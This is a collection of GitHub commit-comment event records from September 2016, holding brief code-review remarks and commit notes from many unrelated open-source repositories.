{"id":"4513258087","type":"CommitCommentEvent","actor":{"login":"Slayer95"},"repo":{"name":"Zarel/Pokemon-Showdown"},"payload":{"comment":{"id":18892124,"position":null,"line":null,"path":null,"commit_id":"6f53fcff3a910c5900482c25b6c5045ca0b928f1","created_at":"2016-09-04T06:02:05Z","updated_at":"2016-09-04T06:02:05Z","body":"user.broadcasting was used for throttling async broadcasts (\"nothing shows up\"!!! *types command again**). I don't recall any other uses, but my memory may fail me.\r\n\r\nRe: weird bugs. Those could have also been fixed by using the this.abortBroadcast() API I suggested in some Issue/PR a few days/weeks ago."}},"created_at":"2016-09-04T06:02:05Z"}
{"id":"4513259468","type":"CommitCommentEvent","actor":{"login":"SubJunk"},"repo":{"name":"UniversalMediaServer/UniversalMediaServer"},"payload":{"comment":{"id":18892137,"position":7,"line":318,"path":"src/main/external-resources/renderers/DefaultRenderer.conf","commit_id":"034c7f431f9de7d78627df394d44bedcbb8c2c2c","created_at":"2016-09-04T06:03:47Z","updated_at":"2016-09-04T06:03:47Z","body":"This should be more like:\r\n\r\n```\r\n# Whether to transcode linear PCM audio files at 44.1 kHz.\r\n# By default they are resampled at 48 kHz. Resampling occurs only if resample\r\n# function is enabled. This makes LPCM audio files strictly DLNA compliant.\r\n```"}},"created_at":"2016-09-04T06:03:47Z"}
{"id":"4513262660","type":"CommitCommentEvent","actor":{"login":"fititnt"},"repo":{"name":"webiwg/eventos-web"},"payload":{"comment":{"id":18892143,"position":null,"line":null,"path":null,"commit_id":"f658fe99ac5a0f77aecfc91fef44cdf3f3a4596a","created_at":"2016-09-04T06:07:49Z","updated_at":"2016-09-04T06:07:49Z","body":"Referente a webiwg/webiwg-issues#10 e webiwg/webiwg-issues#10 "}},"created_at":"2016-09-04T06:07:49Z"}
{"id":"4513262741","type":"CommitCommentEvent","actor":{"login":"Erfan3318"},"repo":{"name":"Erfan3318/Erfan"},"payload":{"comment":{"id":18892144,"position":5,"line":231,"path":"bot/bot.lua","commit_id":"68f00d02fdb657fb99c08e18bdf86fde83f5cb8e","created_at":"2016-09-04T06:07:57Z","updated_at":"2016-09-04T06:07:57Z","body":"121359031"}},"created_at":"2016-09-04T06:07:57Z"}
{"id":"4513263243","type":"CommitCommentEvent","actor":{"login":"daniktheboss"},"repo":{"name":"DarkWav/AntiCheat"},"payload":{"comment":{"id":18892146,"position":27,"line":0,"path":"config.yml","commit_id":"27d5b0f906de9eaf27063ce8f972b1235bfc94a7","created_at":"2016-09-04T06:08:30Z","updated_at":"2016-09-04T06:08:30Z","body":"Which***"}},"created_at":"2016-09-04T06:08:30Z"}
{"id":"4513265755","type":"CommitCommentEvent","actor":{"login":"nartoan"},"repo":{"name":"nartoan/My-Summer"},"payload":{"comment":{"id":18892149,"position":null,"line":null,"path":null,"commit_id":"2f623c165b46c1bbb0d3469ae5408bfeea470861","created_at":"2016-09-04T06:11:26Z","updated_at":"2016-09-04T06:11:26Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;gIAEoYNA&#x2F;5-h-c-ti-p-ph-n-dang-gi\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Học tiếp phần đang giở</a>"}},"created_at":"2016-09-04T06:11:26Z"}
{"id":"4513265849","type":"CommitCommentEvent","actor":{"login":"ccw808"},"repo":{"name":"multitheftauto/mtasa-blue"},"payload":{"comment":{"id":18892150,"position":null,"line":null,"path":null,"commit_id":"6a6d880cc452ca36782b4948b7d20e9ff5a07e83","created_at":"2016-09-04T06:11:36Z","updated_at":"2016-09-04T06:11:36Z","body":"Looks good to me. Only thing left is these two lines:\r\n```\r\nClient\\launch\\GDFImp.rc(4)://#include \"vcexpress_rc_fix.h\"\r\nClient\\launch\\launch.rc(4)://#include \"vcexpress_rc_fix.h\"\r\n```"}},"created_at":"2016-09-04T06:11:36Z"}
{"id":"4513266569","type":"CommitCommentEvent","actor":{"login":"maniac103"},"repo":{"name":"jruesga/rview"},"payload":{"comment":{"id":18892151,"position":null,"line":null,"path":null,"commit_id":"972ee08f07afc8bcf20e376133d085252ab755f5","created_at":"2016-09-04T06:12:18Z","updated_at":"2016-09-04T06:12:18Z","body":"I wonder whether we shouldn't do the highlighting the other way around by highlighting the 'new' (!reviewed) ones."}},"created_at":"2016-09-04T06:12:18Z"}
{"id":"4513266636","type":"CommitCommentEvent","actor":{"login":"Zarel"},"repo":{"name":"Zarel/Pokemon-Showdown"},"payload":{"comment":{"id":18892152,"position":null,"line":null,"path":null,"commit_id":"6f53fcff3a910c5900482c25b6c5045ca0b928f1","created_at":"2016-09-04T06:12:23Z","updated_at":"2016-09-04T06:12:23Z","body":"oh, that makes sense... unfortunately, it needs to be robust against bad code :/"}},"created_at":"2016-09-04T06:12:23Z"}
{"id":"4513267188","type":"CommitCommentEvent","actor":{"login":"fentosi"},"repo":{"name":"ArloSoftware/arlowp-plugin"},"payload":{"comment":{"id":18892153,"position":null,"line":null,"path":null,"commit_id":"1690ced9ce684ed06441799b8214a87753dbf620","created_at":"2016-09-04T06:13:04Z","updated_at":"2016-09-04T06:13:04Z","body":"issue #154 "}},"created_at":"2016-09-04T06:13:04Z"}
{"id":"4513267562","type":"CommitCommentEvent","actor":{"login":"fentosi"},"repo":{"name":"ArloSoftware/arlowp-plugin"},"payload":{"comment":{"id":18892155,"position":null,"line":null,"path":null,"commit_id":"2625d2485e9eb316e438ec1f4d6ff8fe05cefce7","created_at":"2016-09-04T06:13:32Z","updated_at":"2016-09-04T06:13:32Z","body":"issue #154 "}},"created_at":"2016-09-04T06:13:32Z"}
{"id":"4513267674","type":"CommitCommentEvent","actor":{"login":"fentosi"},"repo":{"name":"ArloSoftware/arlowp-plugin"},"payload":{"comment":{"id":18892156,"position":null,"line":null,"path":null,"commit_id":"ca5bae163d92eeb6a6ded3931d82084de8d40b83","created_at":"2016-09-04T06:13:41Z","updated_at":"2016-09-04T06:13:41Z","body":"issue #154 "}},"created_at":"2016-09-04T06:13:41Z"}
{"id":"4513267726","type":"CommitCommentEvent","actor":{"login":"maniac103"},"repo":{"name":"jruesga/rview"},"payload":{"comment":{"id":18892157,"position":null,"line":null,"path":null,"commit_id":"972ee08f07afc8bcf20e376133d085252ab755f5","created_at":"2016-09-04T06:13:46Z","updated_at":"2016-09-04T06:13:46Z","body":"Never mind, I just found the next commit :("}},"created_at":"2016-09-04T06:13:46Z"}
{"id":"4513267972","type":"CommitCommentEvent","actor":{"login":"Zarel"},"repo":{"name":"Zarel/Pokemon-Showdown"},"payload":{"comment":{"id":18892158,"position":null,"line":null,"path":null,"commit_id":"6f53fcff3a910c5900482c25b6c5045ca0b928f1","created_at":"2016-09-04T06:14:06Z","updated_at":"2016-09-04T06:14:06Z","body":"Anyway, in theory `room.lastBroadcast` should already be sufficient for throttling async broadcasts..."}},"created_at":"2016-09-04T06:14:06Z"}
{"id":"4513271247","type":"CommitCommentEvent","actor":{"login":"ssoso27"},"repo":{"name":"ssoso27/avoid"},"payload":{"comment":{"id":18892160,"position":null,"line":null,"path":null,"commit_id":"91e199e81c9fb5dfd11a2eca32aa6ecd5d090c5c","created_at":"2016-09-04T06:17:35Z","updated_at":"2016-09-04T06:17:35Z","body":"모든 Obstacle들의 태그를 \"Obstacle\" 로 변경"}},"created_at":"2016-09-04T06:17:35Z"}
{"id":"4513271376","type":"CommitCommentEvent","actor":{"login":"maniac103"},"repo":{"name":"jruesga/rview"},"payload":{"comment":{"id":18892161,"position":null,"line":null,"path":null,"commit_id":"419f035a9811e467c68bc64d918654af4dace23d","created_at":"2016-09-04T06:17:46Z","updated_at":"2016-09-04T06:17:46Z","body":"I tend to say doing so makes sense, but I don't have a strong opinion on that yet ... I'll try and see how it looks."}},"created_at":"2016-09-04T06:17:46Z"}
{"id":"4513272941","type":"CommitCommentEvent","actor":{"login":"ssoso27"},"repo":{"name":"ssoso27/avoid"},"payload":{"comment":{"id":18892162,"position":null,"line":null,"path":null,"commit_id":"b516d1890ecf33ac7f9d2d61b871a82dee697a07","created_at":"2016-09-04T06:19:36Z","updated_at":"2016-09-04T06:19:36Z","body":"1. GameManager 오브젝트에 GameOver 스크립트 넣음\r\n2. 기존 Player 스크립트에 있던 GameOver 요소 주석처리\r\n\r\n3. GameOver 발생 시, Player 캐릭터 감추기 & 비활성화 실행\r\n4. GameOver 발생 시, 모든 Obstacle 파괴\r\n5. GameOver 발생 시, Game Over 문구 띄움"}},"created_at":"2016-09-04T06:19:36Z"}
{"id":"4513275793","type":"CommitCommentEvent","actor":{"login":"tangjqwysj"},"repo":{"name":"tangjqwysj/dudu"},"payload":{"comment":{"id":18892164,"position":null,"line":null,"path":null,"commit_id":"3335b0ce61092b40080c156d978b4a0da27b5ed8","created_at":"2016-09-04T06:22:57Z","updated_at":"2016-09-04T06:22:57Z","body":"12"}},"created_at":"2016-09-04T06:22:57Z"}
{"id":"4513281723","type":"CommitCommentEvent","actor":{"login":"misha1"},"repo":{"name":"legoboy0215/BulkAnvil2Mcregion"},"payload":{"comment":{"id":18892173,"position":null,"line":null,"path":null,"commit_id":"666f0d4b84894ec68d658c0b0a49be5f54365a95","created_at":"2016-09-04T06:29:15Z","updated_at":"2016-09-04T06:29:15Z","body":"please say how use this?"}},"created_at":"2016-09-04T06:29:15Z"}
{"id":"4513283038","type":"CommitCommentEvent","actor":{"login":"elifoster"},"repo":{"name":"squeek502/VeganOption"},"payload":{"comment":{"id":18892180,"position":null,"line":null,"path":null,"commit_id":"07d17e9389bf4f1bb27dde9337ab780cf21c310a","created_at":"2016-09-04T06:30:50Z","updated_at":"2016-09-04T06:30:50Z","body":"Oh you're right. isPowered should have called getActualState, not getBlockState. I think I had to so some weird manual copying when I recreated this commit and I must've misread that line.\r\n\r\nIt's beneficial because actual states are meant to not be saved to disk. It pretty much defeats the purpose of them if we save to disk anyway using the NBT IO methods. It's sort of over complicating the state."}},"created_at":"2016-09-04T06:30:50Z"}
{"id":"4513283252","type":"CommitCommentEvent","actor":{"login":"ssoso27"},"repo":{"name":"ssoso27/avoid"},"payload":{"comment":{"id":18892181,"position":null,"line":null,"path":null,"commit_id":"8429ee600c286618bdcb4b08e2a9cbc8f63bad38","created_at":"2016-09-04T06:31:08Z","updated_at":"2016-09-04T06:31:08Z","body":"Drop 인식 범위를 5.0f -> 3.0f 로 변경"}},"created_at":"2016-09-04T06:31:08Z"}
{"id":"4513284027","type":"CommitCommentEvent","actor":{"login":"bodadminn"},"repo":{"name":"bodadminn/Project"},"payload":{"comment":{"id":18892182,"position":2,"line":2,"path":"README.md","commit_id":"4e0db01bf5ac99c6f38b5bcd1a2e9033038fe5bd","created_at":"2016-09-04T06:32:06Z","updated_at":"2016-09-04T06:32:06Z","body":"This"}},"created_at":"2016-09-04T06:32:06Z"}
{"id":"4513284655","type":"CommitCommentEvent","actor":{"login":"bodadminn"},"repo":{"name":"bodadminn/Project"},"payload":{"comment":{"id":18892183,"position":2,"line":2,"path":"README.md","commit_id":"4e0db01bf5ac99c6f38b5bcd1a2e9033038fe5bd","created_at":"2016-09-04T06:32:50Z","updated_at":"2016-09-04T06:32:50Z","body":"that"}},"created_at":"2016-09-04T06:32:50Z"}
{"id":"4513284738","type":"CommitCommentEvent","actor":{"login":"bodadminn"},"repo":{"name":"bodadminn/Project"},"payload":{"comment":{"id":18892184,"position":null,"line":null,"path":null,"commit_id":"4e0db01bf5ac99c6f38b5bcd1a2e9033038fe5bd","created_at":"2016-09-04T06:32:57Z","updated_at":"2016-09-04T06:32:57Z","body":"ok"}},"created_at":"2016-09-04T06:32:57Z"}
{"id":"4513287008","type":"CommitCommentEvent","actor":{"login":"Jafnee"},"repo":{"name":"YasinYA/Fourbags"},"payload":{"comment":{"id":18892187,"position":null,"line":null,"path":null,"commit_id":"e3d4f7bb03a6ca1b3a8d26a2cf071fc788ff1361","created_at":"2016-09-04T06:35:36Z","updated_at":"2016-09-04T06:35:36Z","body":"You can try something like this https://code.djangoproject.com/wiki/SplitSettings#Multiplesettingfilesimportingfromeachother\r\n\r\nTo separate sensitive settings and still have the rest source controlled."}},"created_at":"2016-09-04T06:35:36Z"}
{"id":"4513287624","type":"CommitCommentEvent","actor":{"login":"MrCsabaToth"},"repo":{"name":"gdgfresno/valleydevfest"},"payload":{"comment":{"id":18892188,"position":null,"line":null,"path":null,"commit_id":"f680a961f3bbacd244dc0f3fb1cf93ea36ec98fc","created_at":"2016-09-04T06:36:17Z","updated_at":"2016-09-04T06:36:17Z","body":"Fixes #5"}},"created_at":"2016-09-04T06:36:17Z"}
{"id":"4513288993","type":"CommitCommentEvent","actor":{"login":"YasinYA"},"repo":{"name":"YasinYA/Fourbags"},"payload":{"comment":{"id":18892191,"position":null,"line":null,"path":null,"commit_id":"e3d4f7bb03a6ca1b3a8d26a2cf071fc788ff1361","created_at":"2016-09-04T06:37:54Z","updated_at":"2016-09-04T06:37:54Z","body":"Thanks it really helpful"}},"created_at":"2016-09-04T06:37:54Z"}
{"id":"4513289244","type":"CommitCommentEvent","actor":{"login":"jjskuld"},"repo":{"name":"GediminasMasaitis/PokeEase"},"payload":{"comment":{"id":18892192,"position":null,"line":null,"path":null,"commit_id":"1ede9e944ab7fecf5755a950ac4d60fc0e7cd743","created_at":"2016-09-04T06:38:12Z","updated_at":"2016-09-04T06:38:12Z","body":"Very excited to see these changes.  I was just about to implement dynamic config form generated from the schema using https://github.com/jdorn/json-editor\r\n\r\nWere you also thinking along these lines?"}},"created_at":"2016-09-04T06:38:12Z"}
{"id":"4513292376","type":"CommitCommentEvent","actor":{"login":"Chrico"},"repo":{"name":"inpsyde/wpml2mlp"},"payload":{"comment":{"id":18892196,"position":1,"line":0,"path":"assets/js/wpml_export.js","commit_id":"ac3ae459b5160cd9fb560e97d78ed19e00d7612b","created_at":"2016-09-04T06:41:35Z","updated_at":"2016-09-04T06:41:35Z","body":"No need for document ready since you're enqueing it at the bottom of the Page :)"}},"created_at":"2016-09-04T06:41:35Z"}
{"id":"4513292695","type":"CommitCommentEvent","actor":{"login":"seberg"},"repo":{"name":"numpy/numpy"},"payload":{"comment":{"id":18892199,"position":4,"line":367,"path":"numpy/distutils/fcompiler/gnu.py","commit_id":"b831444bee734537daeaffd1455eb88663ee3763","created_at":"2016-09-04T06:41:57Z","updated_at":"2016-09-04T06:41:57Z","body":"oooops"}},"created_at":"2016-09-04T06:41:57Z"}
{"id":"4513294538","type":"CommitCommentEvent","actor":{"login":"abramhindle"},"repo":{"name":"abramhindle/ScPy"},"payload":{"comment":{"id":18892200,"position":65,"line":65,"path":"ugen/loadit/loadit.cpp","commit_id":"f03ff031af4b21b7d4a66e7527373afb578fdcb5","created_at":"2016-09-04T06:44:00Z","updated_at":"2016-09-04T06:44:00Z","body":"This needs to get resolved better."}},"created_at":"2016-09-04T06:44:00Z"}
{"id":"4513294760","type":"CommitCommentEvent","actor":{"login":"abramhindle"},"repo":{"name":"abramhindle/ScPy"},"payload":{"comment":{"id":18892201,"position":73,"line":73,"path":"ugen/loadit/loadit.cpp","commit_id":"f03ff031af4b21b7d4a66e7527373afb578fdcb5","created_at":"2016-09-04T06:44:16Z","updated_at":"2016-09-04T06:44:16Z","body":"Same with this path, it needs to get resolved better. Silly hacks."}},"created_at":"2016-09-04T06:44:16Z"}
{"id":"4513294931","type":"CommitCommentEvent","actor":{"login":"abramhindle"},"repo":{"name":"abramhindle/ScPy"},"payload":{"comment":{"id":18892202,"position":93,"line":93,"path":"ugen/loadit/loadit.cpp","commit_id":"f03ff031af4b21b7d4a66e7527373afb578fdcb5","created_at":"2016-09-04T06:44:29Z","updated_at":"2016-09-04T06:44:29Z","body":"This is dangerously missing."}},"created_at":"2016-09-04T06:44:29Z"}
{"id":"4513295132","type":"CommitCommentEvent","actor":{"login":"munjeni"},"repo":{"name":"sonyxperiadev/kernel"},"payload":{"comment":{"id":18892203,"position":6,"line":1280,"path":"drivers/media/platform/msm/camera_v2/ispif/msm_ispif.c","commit_id":"4edac41997a87fcf136707d8b33d19dc3494f830","created_at":"2016-09-04T06:44:43Z","updated_at":"2016-09-04T06:44:43Z","body":"what about if vfe_info->num_vfe is < 0 ??"}},"created_at":"2016-09-04T06:44:43Z"}
{"id":"4513295290","type":"CommitCommentEvent","actor":{"login":"abramhindle"},"repo":{"name":"abramhindle/ScPy"},"payload":{"comment":{"id":18892204,"position":68,"line":68,"path":"ugen/loadit/loadit.cpp","commit_id":"f03ff031af4b21b7d4a66e7527373afb578fdcb5","created_at":"2016-09-04T06:44:52Z","updated_at":"2016-09-04T06:44:52Z","body":"Need to relink back to scprintf (lazy)"}},"created_at":"2016-09-04T06:44:52Z"}
{"id":"4513295964","type":"CommitCommentEvent","actor":{"login":"abramhindle"},"repo":{"name":"abramhindle/ScPy"},"payload":{"comment":{"id":18892206,"position":9,"line":6,"path":"ugen/Makefile","commit_id":"f03ff031af4b21b7d4a66e7527373afb578fdcb5","created_at":"2016-09-04T06:45:30Z","updated_at":"2016-09-04T06:45:30Z","body":"pkg-config and /usr/bin/x86_64-linux-gnu-python3.5-config return totally different things"}},"created_at":"2016-09-04T06:45:30Z"}
{"id":"4513296247","type":"CommitCommentEvent","actor":{"login":"abramhindle"},"repo":{"name":"abramhindle/ScPy"},"payload":{"comment":{"id":18892207,"position":20,"line":15,"path":"ugen/Makefile","commit_id":"f03ff031af4b21b7d4a66e7527373afb578fdcb5","created_at":"2016-09-04T06:45:50Z","updated_at":"2016-09-04T06:45:50Z","body":"scpy.os is just a silly thing to stop supercollider from loading it."}},"created_at":"2016-09-04T06:45:50Z"}
{"id":"4513296597","type":"CommitCommentEvent","actor":{"login":"amitchitransh"},"repo":{"name":"amitchitransh/BloggersPoint"},"payload":{"comment":{"id":18892208,"position":null,"line":null,"path":null,"commit_id":"9656105f27cd5b91a1cb8d4ad4a9d0222268c8ce","created_at":"2016-09-04T06:46:13Z","updated_at":"2016-09-04T06:46:13Z","body":"Github Repository created"}},"created_at":"2016-09-04T06:46:13Z"}
{"id":"4513298012","type":"CommitCommentEvent","actor":{"login":"abramhindle"},"repo":{"name":"abramhindle/ScPy"},"payload":{"comment":{"id":18892209,"position":73,"line":73,"path":"ugen/loadit/loadit.cpp","commit_id":"f03ff031af4b21b7d4a66e7527373afb578fdcb5","created_at":"2016-09-04T06:47:46Z","updated_at":"2016-09-04T06:47:46Z","body":"Maybe this hack? http://stackoverflow.com/questions/1681060/library-path-when-dynamically-loaded"}},"created_at":"2016-09-04T06:47:46Z"}
{"id":"4513303517","type":"CommitCommentEvent","actor":{"login":"int100"},"repo":{"name":"int100/MyCSharpConsoleApplication1"},"payload":{"comment":{"id":18892216,"position":4,"line":13,"path":"ConsoleApplication1/ConsoleApplication1/Program.cs","commit_id":"3115260d1b5f62ae03249eef816ffa95e8f3bd13","created_at":"2016-09-04T06:53:39Z","updated_at":"2016-09-04T06:53:39Z","body":"It's so interesting."}},"created_at":"2016-09-04T06:53:39Z"}
{"id":"4513303992","type":"CommitCommentEvent","actor":{"login":"retailcoder"},"repo":{"name":"retailcoder/Rubberduck"},"payload":{"comment":{"id":18892217,"position":28,"line":241,"path":"RetailCoder.VBE/UI/Inspections/InspectionResultsViewModel.cs","commit_id":"0fe484eca6ef2fadd11a99101b4094ae8f9098e1","created_at":"2016-09-04T06:54:12Z","updated_at":"2016-09-04T06:54:12Z","body":"this fixes #2194"}},"created_at":"2016-09-04T06:54:12Z"}
{"id":"4513304337","type":"CommitCommentEvent","actor":{"login":"retailcoder"},"repo":{"name":"retailcoder/Rubberduck"},"payload":{"comment":{"id":18892219,"position":44,"line":255,"path":"RetailCoder.VBE/UI/Inspections/InspectionResultsViewModel.cs","commit_id":"0fe484eca6ef2fadd11a99101b4094ae8f9098e1","created_at":"2016-09-04T06:54:34Z","updated_at":"2016-09-04T06:54:34Z","body":"actually *this* fixes #2194"}},"created_at":"2016-09-04T06:54:34Z"}
{"id":"4513304467","type":"CommitCommentEvent","actor":{"login":"int100"},"repo":{"name":"int100/MyCSharpConsoleApplication1"},"payload":{"comment":{"id":18892220,"position":null,"line":null,"path":null,"commit_id":"3115260d1b5f62ae03249eef816ffa95e8f3bd13","created_at":"2016-09-04T06:54:43Z","updated_at":"2016-09-04T06:54:43Z","body":"**It's so interesting for Windows 7.**"}},"created_at":"2016-09-04T06:54:43Z"}
{"id":"4513309764","type":"CommitCommentEvent","actor":{"login":"chrberger"},"repo":{"name":"chalmers-revere/opendlv.usecases"},"payload":{"comment":{"id":18892247,"position":20,"line":20,"path":"documentation-cameras/Dockerfile","commit_id":"5dd201b628d32a1839c7e8aef21b6b7b75242948","created_at":"2016-09-04T07:00:44Z","updated_at":"2016-09-04T07:00:44Z","body":"@HangYin2015 I like that you put a Dockerfile into the folder as well to point to a required base image. Thus, the docker-compose.yml environment is self-contained."}},"created_at":"2016-09-04T07:00:44Z"}
{"id":"4513310593","type":"CommitCommentEvent","actor":{"login":"chrberger"},"repo":{"name":"chalmers-revere/opendlv.usecases"},"payload":{"comment":{"id":18892248,"position":1,"line":1,"path":"documentation-cameras/configuration","commit_id":"5dd201b628d32a1839c7e8aef21b6b7b75242948","created_at":"2016-09-04T07:01:36Z","updated_at":"2016-09-04T07:01:36Z","body":"@HangYin2015 I suggest to strip down the configuration file to have only those parameters that are essentially needed to run the three components (odsupercomponent, proxy, odrecorderh264)."}},"created_at":"2016-09-04T07:01:36Z"}
{"id":"4513311530","type":"CommitCommentEvent","actor":{"login":"chrberger"},"repo":{"name":"chalmers-revere/opendlv.usecases"},"payload":{"comment":{"id":18892251,"position":10,"line":10,"path":"documentation-cameras/docker-compose.yml","commit_id":"5dd201b628d32a1839c7e8aef21b6b7b75242948","created_at":"2016-09-04T07:02:23Z","updated_at":"2016-09-04T07:02:23Z","body":"@HangYin2015 I suggest to use ~/recordings:/opt/recordings as mapped volumes."}},"created_at":"2016-09-04T07:02:23Z"}
{"id":"4513312587","type":"CommitCommentEvent","actor":{"login":"dotModded"},"repo":{"name":"NovaMods/nova-renderer"},"payload":{"comment":{"id":18892252,"position":34,"line":96,"path":"src/main/cpp/core/gui/gui_renderer.h","commit_id":"9be46cd23c897556b35285b14836b20d30bdcceb","created_at":"2016-09-04T07:03:21Z","updated_at":"2016-09-04T07:03:21Z","body":"This line, this is my line, please add a comment letting people know I own this "}},"created_at":"2016-09-04T07:03:21Z"}
{"id":"4513313169","type":"CommitCommentEvent","actor":{"login":"demofan"},"repo":{"name":"JustinChangTW/ASPMVC5HomeWork"},"payload":{"comment":{"id":18892253,"position":9,"line":24,"path":"Session1/Session1/Models/ViewModel/AccountBookViewModel.cs","commit_id":"74c5ae27a6f649a939bba68635141c18f2f29493","created_at":"2016-09-04T07:03:49Z","updated_at":"2016-09-04T07:03:49Z","body":"1. double.MaxValue=`1.79769313486232E+308`\r\n2. decimal.MaxValue=`79228162514264337593543950335`\r\n3. ((double)decimal.MaxValue)=`7.92281625142643E+28`\r\n\r\n看了以上的最大值以後你會不會覺得你宣告 decimal.MaxValue 後轉成 double 有點莫名？"}},"created_at":"2016-09-04T07:03:49Z"}
{"id":"4513313246","type":"CommitCommentEvent","actor":{"login":"chrberger"},"repo":{"name":"chalmers-revere/opendlv.usecases"},"payload":{"comment":{"id":18892254,"position":20,"line":20,"path":"documentation-cameras/docker-compose.yml","commit_id":"5dd201b628d32a1839c7e8aef21b6b7b75242948","created_at":"2016-09-04T07:03:53Z","updated_at":"2016-09-04T07:03:53Z","body":"@HangYin2015 In the code for proxy, there are parts where the need for a screen/display can be disabled. The three tools odsupercomponent, proxy, and odrecorderh264 should work mainly in \"headless mode\", i.e. without a graphical environment. Therefore, I suggest to remove the parameters for environment and volumes."}},"created_at":"2016-09-04T07:03:53Z"}
{"id":"4513315272","type":"CommitCommentEvent","actor":{"login":"chrberger"},"repo":{"name":"chalmers-revere/opendlv.usecases"},"payload":{"comment":{"id":18892259,"position":28,"line":28,"path":"documentation-cameras/docker-compose.yml","commit_id":"5dd201b628d32a1839c7e8aef21b6b7b75242948","created_at":"2016-09-04T07:05:31Z","updated_at":"2016-09-04T07:05:31Z","body":"@HangYin2015 This docker-compose.yml environment uses the miniature/proxy tool which is working but an experimental tool originating from the scaled cars. I suggest to switch to https://github.com/chalmers-revere/opendlv.core/tree/feature.camera in the Docker image https://hub.docker.com/r/seresearch/opendlv-core-on-opendavinci-ubuntu-16.04-complete to have the one from OpenDLV.core."}},"created_at":"2016-09-04T07:05:31Z"}
{"id":"4513315938","type":"CommitCommentEvent","actor":{"login":"chrberger"},"repo":{"name":"chalmers-revere/opendlv.usecases"},"payload":{"comment":{"id":18892262,"position":5,"line":10,"path":"documentation-cameras/docker-compose.yml","commit_id":"9709ffaa9b70fd98392a4855b42b5c492701aa10","created_at":"2016-09-04T07:06:15Z","updated_at":"2016-09-04T07:06:15Z","body":"@HangYin2015 As discussed, you should have a directory structure that is not dependent on your local setup."}},"created_at":"2016-09-04T07:06:15Z"}
{"id":"4513318466","type":"CommitCommentEvent","actor":{"login":"SosoHyun"},"repo":{"name":"deanblue/AHang_DialectCollection"},"payload":{"comment":{"id":18892279,"position":null,"line":null,"path":null,"commit_id":"6a40dde3ba27f3069490466d44fc32957e588393","created_at":"2016-09-04T07:08:53Z","updated_at":"2016-09-04T07:08:53Z","body":"지도"}},"created_at":"2016-09-04T07:08:53Z"}
{"id":"4513323281","type":"CommitCommentEvent","actor":{"login":"staabm"},"repo":{"name":"acidjazz/whoops"},"payload":{"comment":{"id":18892285,"position":5,"line":62,"path":"tests/Whoops/Handler/JsonResponseHandlerTest.php","commit_id":"f2c034ce4cf83956074741dbee415712f63bac05","created_at":"2016-09-04T07:13:45Z","updated_at":"2016-09-04T07:13:45Z","body":"Dont remove this vars.. Code is more readable when those exist"}},"created_at":"2016-09-04T07:13:45Z"}
{"id":"4513324416","type":"CommitCommentEvent","actor":{"login":"nigelcharman"},"repo":{"name":"concordion/concordion"},"payload":{"comment":{"id":18892286,"position":13,"line":42,"path":"src/main/java/org/concordion/internal/command/executeCommand/ExecuteCommandTableStrategy.java","commit_id":"46a8b93905995ab3a059431ae89a57ea8c694082","created_at":"2016-09-04T07:15:05Z","updated_at":"2016-09-04T07:15:05Z","body":"Just wondering if you'd had a chance to consider whether this should be in a finally block?"}},"created_at":"2016-09-04T07:15:05Z"}
{"id":"4513325129","type":"CommitCommentEvent","actor":{"login":"MatveiKalin"},"repo":{"name":"MatveiKalin/algograph"},"payload":{"comment":{"id":18892287,"position":null,"line":null,"path":null,"commit_id":"3415a26c967e7135f8cdde48a305429d055a4d94","created_at":"2016-09-04T07:15:46Z","updated_at":"2016-09-04T07:15:46Z","body":"В этом коммите я попробовал изменить на главной странице информацию, добавив в заголовок второго уровня (<h2></h2>) слово \"Некоторые\"."}},"created_at":"2016-09-04T07:15:46Z"}
{"id":"4513325220","type":"CommitCommentEvent","actor":{"login":"n0aaz"},"repo":{"name":"CM-FK/android_device_xiaomi_kenzo"},"payload":{"comment":{"id":18892288,"position":null,"line":null,"path":null,"commit_id":"4fb15ea410dfb2cdb069d667899247cb6ba95ed1","created_at":"2016-09-04T07:15:53Z","updated_at":"2016-09-04T07:15:53Z","body":"As we have a hexa core device, shouldn't the threads used for boot be 6 instead of 4?"}},"created_at":"2016-09-04T07:15:53Z"}
{"id":"4513325458","type":"CommitCommentEvent","actor":{"login":"davidmolina"},"repo":{"name":"OperationCode/operationcode"},"payload":{"comment":{"id":18892289,"position":null,"line":null,"path":null,"commit_id":"dc8ec19a31305d22186831d8227070d89db19e0d","created_at":"2016-09-04T07:16:02Z","updated_at":"2016-09-04T07:16:02Z","body":"Fix blog link. "}},"created_at":"2016-09-04T07:16:02Z"}
{"id":"4513328860","type":"CommitCommentEvent","actor":{"login":"djalova"},"repo":{"name":"SparkTC/stocator"},"payload":{"comment":{"id":18892293,"position":59,"line":59,"path":"src/main/java/com/ibm/stocator/fs/swift/http/SwiftConnectionManager.java","commit_id":"1d513d66f137990abcaabb404abc53dc996e8f91","created_at":"2016-09-04T07:19:52Z","updated_at":"2016-09-04T07:19:52Z","body":"I try to cause an error by simply turning off my internet connection."}},"created_at":"2016-09-04T07:19:52Z"}
{"id":"4513329974","type":"CommitCommentEvent","actor":{"login":"Simn"},"repo":{"name":"nadako/haxe"},"payload":{"comment":{"id":18892294,"position":null,"line":null,"path":null,"commit_id":"be83a8c951faa751230349665185c7680f80b9aa","created_at":"2016-09-04T07:20:59Z","updated_at":"2016-09-04T07:20:59Z","body":"This is very similar to the constructor inlining checks. It's too bad we cannot represent the desired expression in our texpr AST, else we could totally re-use that."}},"created_at":"2016-09-04T07:20:59Z"}
{"id":"4513330124","type":"CommitCommentEvent","actor":{"login":"lucabrivio"},"repo":{"name":"joergoster/Stockfish"},"payload":{"comment":{"id":18892295,"position":null,"line":null,"path":null,"commit_id":"480f1e4f1457bf2b4e4d46ff9cbc7bb1580695ae","created_at":"2016-09-04T07:21:08Z","updated_at":"2016-09-04T07:21:08Z","body":"Looks good! Which material configuration does it leave out?"}},"created_at":"2016-09-04T07:21:08Z"}
